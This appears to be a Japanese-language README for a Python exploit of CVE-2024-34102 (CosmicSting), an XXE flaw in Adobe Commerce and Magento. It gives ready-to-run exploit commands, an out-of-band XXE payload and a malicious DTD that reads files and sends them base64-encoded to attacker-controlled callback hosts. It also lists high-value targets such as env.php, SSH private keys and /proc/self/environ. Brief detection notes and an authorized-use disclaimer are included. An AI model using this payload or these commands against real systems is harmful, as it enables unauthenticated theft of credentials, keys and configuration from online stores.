
CVE-2024-34102 エクスプロイト(python3 用)
CVE-2024-34102 (CosmicSting) のエクスプロイト - Adobe Commerce および Magento の XML 外部実体 (XXE) 脆弱性。
CVE-2024-34102 は、以下に影響を与える重大な XXE (XML 外部実体) 脆弱性です:
この脆弱性により、認証されていない攻撃者は以下を行うことができます:
CVSS スコア: 9.8 (緊急)
このエクスプロイトは、以下によるオリジナルの成果に基づいています:
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102
# Install dependencies
pip install -r requirements.txt
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com
ターミナル1 - DTD サーバー:
sudo python3 server_dtd.py
ターミナル2 - エクスプロイト:
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com \
--dtd-server YOUR-IP:8000
ターミナル1 - DTD サーバー:
sudo python3 server_dtd.py
ターミナル2 - コールバックサーバー (自動デコード):
sudo python3 callback_server.py
ターミナル3 - エクスプロイト:
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c YOUR-CALLBACK-IP \
--dtd-server YOUR-DTD-IP:8000
-u, --url - ターゲット URL (ベースドメイン)-f, --file - サーバーから読み取るファイル (例: /etc/passwd)-c, --callback - コールバックサーバー (IP/ドメイン)--dtd-server - DTD ファイルをホストするカスタムサーバー--https - コールバックに HTTPS を使用 (デフォルト: HTTP)python3 exploit.py \
-u https://vulnerable-site.com \
-f /etc/passwd \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://vulnerable-site.com \
-f /var/www/html/app/etc/env.php \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://vulnerable-site.com \
-f /home/ubuntu/.ssh/id_rsa \
-c abc123.burpcollaborator.net \
--dtd-server 192.168.1.100:8000 \
--https
このエクスプロイトは、データを外部に送信するために帯域外 XXE 技術を使用します:
<!-- Payload sent to target -->
<!DOCTYPE r [
<!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
ターゲットサーバーが悪意のある DTD をダウンロードします:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">
サーバーは XML を処理し、ファイルを読み取り、base64 でエンコードしてコールバックサーバーに送信します:
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http
DTD will be dynamically generated with:
[*] Callback: http://abc123.oastify.com
[*] File: /etc/passwd
DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...
=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>
To decode the exfiltrated data:
[*] echo 'BASE64_STRING' | base64 -d
[!] Check your Burp Collaborator or Oastify dashboard now!
検出:
/rest/V1/guest-carts/*/estimate-shipping-methods エンドポイントへの HTTP リクエストを監視する<!ENTITY>) を含む XML ペイロードをアラートする緩和策:
テスト対象の注目ファイル:
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ
このエクスプロイトは、教育およびセキュリティ研究の目的でのみ提供されます。
明示的な許可なしにシステムをテストするためにこのコードを使用することは違法です。
あなたは自身の行動に対して単独で責任を負います。以下の場合にのみ使用してください:
✅ 自身のテスト環境
✅ 承認されたバグ報奨金プログラム
✅ 契約済みのペネトレーションテスト
以下の用途では使用しないでください:
❌ 許可のないシステム
❌ 許可のない本番環境
❌ 悪意のある活動
作者はこのコードの誤用について責任を負いません。
⭐ このプロジェクトが役に立った場合は、スターを付けていただけると嬉しいです!